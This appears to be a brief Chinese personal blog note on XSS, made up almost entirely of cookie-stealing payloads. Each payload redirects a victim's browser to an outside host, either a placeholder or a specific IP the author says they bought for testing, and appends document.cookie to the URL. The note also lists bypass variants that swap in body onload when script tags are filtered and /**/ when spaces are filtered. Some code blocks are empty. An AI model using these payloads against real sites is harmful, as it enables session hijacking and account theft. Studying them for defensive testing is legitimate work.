XSS远程执行漏洞

XSS远程执行漏洞
huaruiXSS远程执行漏洞
常用js语句
1 |
|
常用playload:
1 | <script>window.location.href='http://[ip]/xss.php?cookie='+document.cookie</script> |
我直接买了一个服务器并且开放了读写权限可以拿来实验XSS
1 | 相关的ip和playload |
绕过
- 过滤script标签
1 | <body onload="document.location.href='http://106.53.207.220/xss.php?xss='+document.cookie"></body> |
- 过滤空格(使用tab、/**/来绕过)
1 | <body/**/onload="document.location.href='http://106.53.207.220/xss.php?xss='+document.cookie"></body> |
- 其他可行的playload
1 | <body/**/onload="document.location.href='http://106.53.207.220/x.php?x='+document.cookie"></body> |




